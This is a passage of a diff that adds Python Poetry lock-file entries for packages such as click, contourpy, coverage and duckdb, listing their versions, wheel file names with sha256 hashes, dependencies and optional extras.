+ {file = "click-8.1.8-py3-none-any.whl", hash = "sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2"},
+ {file = "click-8.1.8.tar.gz", hash = "sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "platform_system == \"Windows\""}
+
+[[package]]
+name = "codespell"
+version = "2.3.0"
+description = "Codespell"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "codespell-2.3.0-py3-none-any.whl", hash = "sha256:a9c7cef2501c9cfede2110fd6d4e5e62296920efe9abfb84648df866e47f58d1"},
+ {file = "codespell-2.3.0.tar.gz", hash = "sha256:360c7d10f75e65f67bad720af7007e1060a5d395670ec11a7ed1fed9dd17471f"},
+]
+
+[package.extras]
+dev = ["Pygments", "build", "chardet", "pre-commit", "pytest", "pytest-cov", "pytest-dependency", "ruff", "tomli", "twine"]
+hard-encoding-detection = ["chardet"]
+toml = ["tomli"]
+types = ["chardet (>=5.1.0)", "mypy", "pytest", "pytest-cov", "pytest-dependency"]
+
+[[package]]
+name = "colorama"
+version = "0.4.6"
+description = "Cross-platform colored terminal text."
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
+files = [
+ {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
+ {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
+]
+
+[[package]]
+name = "contourpy"
+version = "1.1.1"
+description = "Python library for calculating contours of 2D quadrilateral grids"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "contourpy-1.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:46e24f5412c948d81736509377e255f6040e94216bf1a9b5ea1eaa9d29f6ec1b"},
+ {file = "contourpy-1.1.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0e48694d6a9c5a26ee85b10130c77a011a4fedf50a7279fa0bdaf44bafb4299d"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a66045af6cf00e19d02191ab578a50cb93b2028c3eefed999793698e9ea768ae"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4ebf42695f75ee1a952f98ce9775c873e4971732a87334b099dde90b6af6a916"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6aec19457617ef468ff091669cca01fa7ea557b12b59a7908b9474bb9674cf0"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:462c59914dc6d81e0b11f37e560b8a7c2dbab6aca4f38be31519d442d6cde1a1"},
+ {file = "contourpy-1.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:6d0a8efc258659edc5299f9ef32d8d81de8b53b45d67bf4bfa3067f31366764d"},
+ {file = "contourpy-1.1.1-cp310-cp310-win32.whl", hash = "sha256:d6ab42f223e58b7dac1bb0af32194a7b9311065583cc75ff59dcf301afd8a431"},
+ {file = "contourpy-1.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:549174b0713d49871c6dee90a4b499d3f12f5e5f69641cd23c50a4542e2ca1eb"},
+ {file = "contourpy-1.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:407d864db716a067cc696d61fa1ef6637fedf03606e8417fe2aeed20a061e6b2"},
+ {file = "contourpy-1.1.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dfe80c017973e6a4c367e037cb31601044dd55e6bfacd57370674867d15a899b"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e30aaf2b8a2bac57eb7e1650df1b3a4130e8d0c66fc2f861039d507a11760e1b"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3de23ca4f381c3770dee6d10ead6fff524d540c0f662e763ad1530bde5112532"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:566f0e41df06dfef2431defcfaa155f0acfa1ca4acbf8fd80895b1e7e2ada40e"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b04c2f0adaf255bf756cf08ebef1be132d3c7a06fe6f9877d55640c5e60c72c5"},
+ {file = "contourpy-1.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d0c188ae66b772d9d61d43c6030500344c13e3f73a00d1dc241da896f379bb62"},
+ {file = "contourpy-1.1.1-cp311-cp311-win32.whl", hash = "sha256:0683e1ae20dc038075d92e0e0148f09ffcefab120e57f6b4c9c0f477ec171f33"},
+ {file = "contourpy-1.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:8636cd2fc5da0fb102a2504fa2c4bea3cbc149533b345d72cdf0e7a924decc45"},
+ {file = "contourpy-1.1.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:560f1d68a33e89c62da5da4077ba98137a5e4d3a271b29f2f195d0fba2adcb6a"},
+ {file = "contourpy-1.1.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:24216552104ae8f3b34120ef84825400b16eb6133af2e27a190fdc13529f023e"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56de98a2fb23025882a18b60c7f0ea2d2d70bbbcfcf878f9067234b1c4818442"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:07d6f11dfaf80a84c97f1a5ba50d129d9303c5b4206f776e94037332e298dda8"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1eaac5257a8f8a047248d60e8f9315c6cff58f7803971170d952555ef6344a7"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:19557fa407e70f20bfaba7d55b4d97b14f9480856c4fb65812e8a05fe1c6f9bf"},
+ {file = "contourpy-1.1.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:081f3c0880712e40effc5f4c3b08feca6d064cb8cfbb372ca548105b86fd6c3d"},
+ {file = "contourpy-1.1.1-cp312-cp312-win32.whl", hash = "sha256:059c3d2a94b930f4dafe8105bcdc1b21de99b30b51b5bce74c753686de858cb6"},
+ {file = "contourpy-1.1.1-cp312-cp312-win_amd64.whl", hash = "sha256:f44d78b61740e4e8c71db1cf1fd56d9050a4747681c59ec1094750a658ceb970"},
+ {file = "contourpy-1.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:70e5a10f8093d228bb2b552beeb318b8928b8a94763ef03b858ef3612b29395d"},
+ {file = "contourpy-1.1.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8394e652925a18ef0091115e3cc191fef350ab6dc3cc417f06da66bf98071ae9"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c5bd5680f844c3ff0008523a71949a3ff5e4953eb7701b28760805bc9bcff217"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:66544f853bfa85c0d07a68f6c648b2ec81dafd30f272565c37ab47a33b220684"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e0c02b75acfea5cab07585d25069207e478d12309557f90a61b5a3b4f77f46ce"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:41339b24471c58dc1499e56783fedc1afa4bb018bcd035cfb0ee2ad2a7501ef8"},
+ {file = "contourpy-1.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f29fb0b3f1217dfe9362ec55440d0743fe868497359f2cf93293f4b2701b8251"},
+ {file = "contourpy-1.1.1-cp38-cp38-win32.whl", hash = "sha256:f9dc7f933975367251c1b34da882c4f0e0b2e24bb35dc906d2f598a40b72bfc7"},
+ {file = "contourpy-1.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:498e53573e8b94b1caeb9e62d7c2d053c263ebb6aa259c81050766beb50ff8d9"},
+ {file = "contourpy-1.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:ba42e3810999a0ddd0439e6e5dbf6d034055cdc72b7c5c839f37a7c274cb4eba"},
+ {file = "contourpy-1.1.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:6c06e4c6e234fcc65435223c7b2a90f286b7f1b2733058bdf1345d218cc59e34"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ca6fab080484e419528e98624fb5c4282148b847e3602dc8dbe0cb0669469887"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:93df44ab351119d14cd1e6b52a5063d3336f0754b72736cc63db59307dabb718"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:eafbef886566dc1047d7b3d4b14db0d5b7deb99638d8e1be4e23a7c7ac59ff0f"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:efe0fab26d598e1ec07d72cf03eaeeba8e42b4ecf6b9ccb5a356fde60ff08b85"},
+ {file = "contourpy-1.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:f08e469821a5e4751c97fcd34bcb586bc243c39c2e39321822060ba902eac49e"},
+ {file = "contourpy-1.1.1-cp39-cp39-win32.whl", hash = "sha256:bfc8a5e9238232a45ebc5cb3bfee71f1167064c8d382cadd6076f0d51cff1da0"},
+ {file = "contourpy-1.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:c84fdf3da00c2827d634de4fcf17e3e067490c4aea82833625c4c8e6cdea0887"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:229a25f68046c5cf8067d6d6351c8b99e40da11b04d8416bf8d2b1d75922521e"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a10dab5ea1bd4401c9483450b5b0ba5416be799bbd50fc7a6cc5e2a15e03e8a3"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:4f9147051cb8fdb29a51dc2482d792b3b23e50f8f57e3720ca2e3d438b7adf23"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:a75cc163a5f4531a256f2c523bd80db509a49fc23721b36dd1ef2f60ff41c3cb"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b53d5769aa1f2d4ea407c65f2d1d08002952fac1d9e9d307aa2e1023554a163"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:11b836b7dbfb74e049c302bbf74b4b8f6cb9d0b6ca1bf86cfa8ba144aedadd9c"},
+ {file = "contourpy-1.1.1.tar.gz", hash = "sha256:96ba37c2e24b7212a77da85004c38e7c4d155d3e72a45eeaf22c1f03f607e8ab"},
+]
+
+[package.dependencies]
+numpy = {version = ">=1.16,<2.0", markers = "python_version <= \"3.11\""}
+
+[package.extras]
+bokeh = ["bokeh", "selenium"]
+docs = ["furo", "sphinx (>=7.2)", "sphinx-copybutton"]
+mypy = ["contourpy[bokeh,docs]", "docutils-stubs", "mypy (==1.4.1)", "types-Pillow"]
+test = ["Pillow", "contourpy[test-no-images]", "matplotlib"]
+test-no-images = ["pytest", "pytest-cov", "wurlitzer"]
+
+[[package]]
+name = "coverage"
+version = "7.6.1"
+description = "Code coverage measurement for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "coverage-7.6.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b06079abebbc0e89e6163b8e8f0e16270124c154dc6e4a47b413dd538859af16"},
+ {file = "coverage-7.6.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:cf4b19715bccd7ee27b6b120e7e9dd56037b9c0681dcc1adc9ba9db3d417fa36"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e61c0abb4c85b095a784ef23fdd4aede7a2628478e7baba7c5e3deba61070a02"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fd21f6ae3f08b41004dfb433fa895d858f3f5979e7762d052b12aef444e29afc"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f59d57baca39b32db42b83b2a7ba6f47ad9c394ec2076b084c3f029b7afca23"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:a1ac0ae2b8bd743b88ed0502544847c3053d7171a3cff9228af618a068ed9c34"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:e6a08c0be454c3b3beb105c0596ebdc2371fab6bb90c0c0297f4e58fd7e1012c"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f5796e664fe802da4f57a168c85359a8fbf3eab5e55cd4e4569fbacecc903959"},
+ {file = "coverage-7.6.1-cp310-cp310-win32.whl", hash = "sha256:7bb65125fcbef8d989fa1dd0e8a060999497629ca5b0efbca209588a73356232"},
+ {file = "coverage-7.6.1-cp310-cp310-win_amd64.whl", hash = "sha256:3115a95daa9bdba70aea750db7b96b37259a81a709223c8448fa97727d546fe0"},
+ {file = "coverage-7.6.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7dea0889685db8550f839fa202744652e87c60015029ce3f60e006f8c4462c93"},
+ {file = "coverage-7.6.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed37bd3c3b063412f7620464a9ac1314d33100329f39799255fb8d3027da50d3"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d85f5e9a5f8b73e2350097c3756ef7e785f55bd71205defa0bfdaf96c31616ff"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9bc572be474cafb617672c43fe989d6e48d3c83af02ce8de73fff1c6bb3c198d"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0c0420b573964c760df9e9e86d1a9a622d0d27f417e1a949a8a66dd7bcee7bc6"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:1f4aa8219db826ce6be7099d559f8ec311549bfc4046f7f9fe9b5cea5c581c56"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:fc5a77d0c516700ebad189b587de289a20a78324bc54baee03dd486f0855d234"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:b48f312cca9621272ae49008c7f613337c53fadca647d6384cc129d2996d1133"},
+ {file = "coverage-7.6.1-cp311-cp311-win32.whl", hash = "sha256:1125ca0e5fd475cbbba3bb67ae20bd2c23a98fac4e32412883f9bcbaa81c314c"},
+ {file = "coverage-7.6.1-cp311-cp311-win_amd64.whl", hash = "sha256:8ae539519c4c040c5ffd0632784e21b2f03fc1340752af711f33e5be83a9d6c6"},
+ {file = "coverage-7.6.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:95cae0efeb032af8458fc27d191f85d1717b1d4e49f7cb226cf526ff28179778"},
+ {file = "coverage-7.6.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:5621a9175cf9d0b0c84c2ef2b12e9f5f5071357c4d2ea6ca1cf01814f45d2391"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:260933720fdcd75340e7dbe9060655aff3af1f0c5d20f46b57f262ab6c86a5e8"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:07e2ca0ad381b91350c0ed49d52699b625aab2b44b65e1b4e02fa9df0e92ad2d"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c44fee9975f04b33331cb8eb272827111efc8930cfd582e0320613263ca849ca"},
+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:877abb17e6339d96bf08e7a622d05095e72b71f8afd8a9fefc82cf30ed944163"},
+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:3e0cadcf6733c09154b461f1ca72d5416635e5e4ec4e536192180d34ec160f8a"},
+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:c3c02d12f837d9683e5ab2f3d9844dc57655b92c74e286c262e0fc54213c216d"},
+ {file = "coverage-7.6.1-cp312-cp312-win32.whl", hash = "sha256:e05882b70b87a18d937ca6768ff33cc3f72847cbc4de4491c8e73880766718e5"},
+ {file = "coverage-7.6.1-cp312-cp312-win_amd64.whl", hash = "sha256:b5d7b556859dd85f3a541db6a4e0167b86e7273e1cdc973e5b175166bb634fdb"},
+ {file = "coverage-7.6.1-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:a4acd025ecc06185ba2b801f2de85546e0b8ac787cf9d3b06e7e2a69f925b106"},
+ {file = "coverage-7.6.1-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:a6d3adcf24b624a7b778533480e32434a39ad8fa30c315208f6d3e5542aeb6e9"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0c212c49b6c10e6951362f7c6df3329f04c2b1c28499563d4035d964ab8e08c"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6e81d7a3e58882450ec4186ca59a3f20a5d4440f25b1cff6f0902ad890e6748a"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:78b260de9790fd81e69401c2dc8b17da47c8038176a79092a89cb2b7d945d060"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:a78d169acd38300060b28d600344a803628c3fd585c912cacc9ea8790fe96862"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:2c09f4ce52cb99dd7505cd0fc8e0e37c77b87f46bc9c1eb03fe3bc9991085388"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:6878ef48d4227aace338d88c48738a4258213cd7b74fd9a3d4d7582bb1d8a155"},
+ {file = "coverage-7.6.1-cp313-cp313-win32.whl", hash = "sha256:44df346d5215a8c0e360307d46ffaabe0f5d3502c8a1cefd700b34baf31d411a"},
+ {file = "coverage-7.6.1-cp313-cp313-win_amd64.whl", hash = "sha256:8284cf8c0dd272a247bc154eb6c95548722dce90d098c17a883ed36e67cdb129"},
+ {file = "coverage-7.6.1-cp313-cp313t-macosx_10_13_x86_64.whl", hash = "sha256:d3296782ca4eab572a1a4eca686d8bfb00226300dcefdf43faa25b5242ab8a3e"},
+ {file = "coverage-7.6.1-cp313-cp313t-macosx_11_0_arm64.whl", hash = "sha256:502753043567491d3ff6d08629270127e0c31d4184c4c8d98f92c26f65019962"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6a89ecca80709d4076b95f89f308544ec8f7b4727e8a547913a35f16717856cb"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a318d68e92e80af8b00fa99609796fdbcdfef3629c77c6283566c6f02c6d6704"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:13b0a73a0896988f053e4fbb7de6d93388e6dd292b0d87ee51d106f2c11b465b"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_aarch64.whl", hash = "sha256:4421712dbfc5562150f7554f13dde997a2e932a6b5f352edcce948a815efee6f"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_i686.whl", hash = "sha256:166811d20dfea725e2e4baa71fffd6c968a958577848d2131f39b60043400223"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_x86_64.whl", hash = "sha256:225667980479a17db1048cb2bf8bfb39b8e5be8f164b8f6628b64f78a72cf9d3"},
+ {file = "coverage-7.6.1-cp313-cp313t-win32.whl", hash = "sha256:170d444ab405852903b7d04ea9ae9b98f98ab6d7e63e1115e82620807519797f"},
+ {file = "coverage-7.6.1-cp313-cp313t-win_amd64.whl", hash = "sha256:b9f222de8cded79c49bf184bdbc06630d4c58eec9459b939b4a690c82ed05657"},
+ {file = "coverage-7.6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6db04803b6c7291985a761004e9060b2bca08da6d04f26a7f2294b8623a0c1a0"},
+ {file = "coverage-7.6.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:f1adfc8ac319e1a348af294106bc6a8458a0f1633cc62a1446aebc30c5fa186a"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a95324a9de9650a729239daea117df21f4b9868ce32e63f8b650ebe6cef5595b"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b43c03669dc4618ec25270b06ecd3ee4fa94c7f9b3c14bae6571ca00ef98b0d3"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8929543a7192c13d177b770008bc4e8119f2e1f881d563fc6b6305d2d0ebe9de"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:a09ece4a69cf399510c8ab25e0950d9cf2b42f7b3cb0374f95d2e2ff594478a6"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:9054a0754de38d9dbd01a46621636689124d666bad1936d76c0341f7d71bf569"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0dbde0f4aa9a16fa4d754356a8f2e36296ff4d83994b2c9d8398aa32f222f989"},
+ {file = "coverage-7.6.1-cp38-cp38-win32.whl", hash = "sha256:da511e6ad4f7323ee5702e6633085fb76c2f893aaf8ce4c51a0ba4fc07580ea7"},
+ {file = "coverage-7.6.1-cp38-cp38-win_amd64.whl", hash = "sha256:3f1156e3e8f2872197af3840d8ad307a9dd18e615dc64d9ee41696f287c57ad8"},
+ {file = "coverage-7.6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:abd5fd0db5f4dc9289408aaf34908072f805ff7792632250dcb36dc591d24255"},
+ {file = "coverage-7.6.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:547f45fa1a93154bd82050a7f3cddbc1a7a4dd2a9bf5cb7d06f4ae29fe94eaf8"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:645786266c8f18a931b65bfcefdbf6952dd0dea98feee39bd188607a9d307ed2"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9e0b2df163b8ed01d515807af24f63de04bebcecbd6c3bfeff88385789fdf75a"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:609b06f178fe8e9f89ef676532760ec0b4deea15e9969bf754b37f7c40326dbc"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:702855feff378050ae4f741045e19a32d57d19f3e0676d589df0575008ea5004"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:2bdb062ea438f22d99cba0d7829c2ef0af1d768d1e4a4f528087224c90b132cb"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:9c56863d44bd1c4fe2abb8a4d6f5371d197f1ac0ebdee542f07f35895fc07f36"},
+ {file = "coverage-7.6.1-cp39-cp39-win32.whl", hash = "sha256:6e2cd258d7d927d09493c8df1ce9174ad01b381d4729a9d8d4e38670ca24774c"},
+ {file = "coverage-7.6.1-cp39-cp39-win_amd64.whl", hash = "sha256:06a737c882bd26d0d6ee7269b20b12f14a8704807a01056c80bb881a4b2ce6ca"},
+ {file = "coverage-7.6.1-pp38.pp39.pp310-none-any.whl", hash = "sha256:e9a6e0eb86070e8ccaedfbd9d38fec54864f3125ab95419970575b42af7541df"},
+ {file = "coverage-7.6.1.tar.gz", hash = "sha256:953510dfb7b12ab69d20135a0662397f077c59b1e6379a768e97c59d852ee51d"},
+]
+
+[package.extras]
+toml = ["tomli"]
+
+[[package]]
+name = "cycler"
+version = "0.12.1"
+description = "Composable style cycles"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "cycler-0.12.1-py3-none-any.whl", hash = "sha256:85cef7cff222d8644161529808465972e51340599459b8ac3ccbac5a854e0d30"},
+ {file = "cycler-0.12.1.tar.gz", hash = "sha256:88bb128f02ba341da8ef447245a9e138fae777f6a23943da4540077d3601eb1c"},
+]
+
+[package.extras]
+docs = ["ipython", "matplotlib", "numpydoc", "sphinx"]
+tests = ["pytest", "pytest-cov", "pytest-xdist"]
+
+[[package]]
+name = "distlib"
+version = "0.3.9"
+description = "Distribution utilities"
+optional = false
+python-versions = "*"
+files = [
+ {file = "distlib-0.3.9-py2.py3-none-any.whl", hash = "sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87"},
+ {file = "distlib-0.3.9.tar.gz", hash = "sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403"},
+]
+
+[[package]]
+name = "duckdb"
+version = "1.1.3"
+description = "DuckDB in-process database"
+optional = false
+python-versions = ">=3.7.0"
+files = [
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:1c0226dc43e2ee4cc3a5a4672fddb2d76fd2cf2694443f395c02dd1bea0b7fce"},
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_universal2.whl", hash = "sha256:7c71169fa804c0b65e49afe423ddc2dc83e198640e3b041028da8110f7cd16f7"},
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:872d38b65b66e3219d2400c732585c5b4d11b13d7a36cd97908d7981526e9898"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25fb02629418c0d4d94a2bc1776edaa33f6f6ccaa00bd84eb96ecb97ae4b50e9"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9e3f5cd604e7c39527e6060f430769b72234345baaa0987f9500988b2814f5e4"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:08935700e49c187fe0e9b2b86b5aad8a2ccd661069053e38bfaed3b9ff795efd"},
+ {file = "duckdb-1.1.3-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f9b47036945e1db32d70e414a10b1593aec641bd4c5e2056873d971cc21e978b"},
+ {file = "duckdb-1.1.3-cp310-cp310-win_amd64.whl", hash = "sha256:35c420f58abc79a68a286a20fd6265636175fadeca1ce964fc8ef159f3acc289"},
+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:4f0e2e5a6f5a53b79aee20856c027046fba1d73ada6178ed8467f53c3877d5e0"},
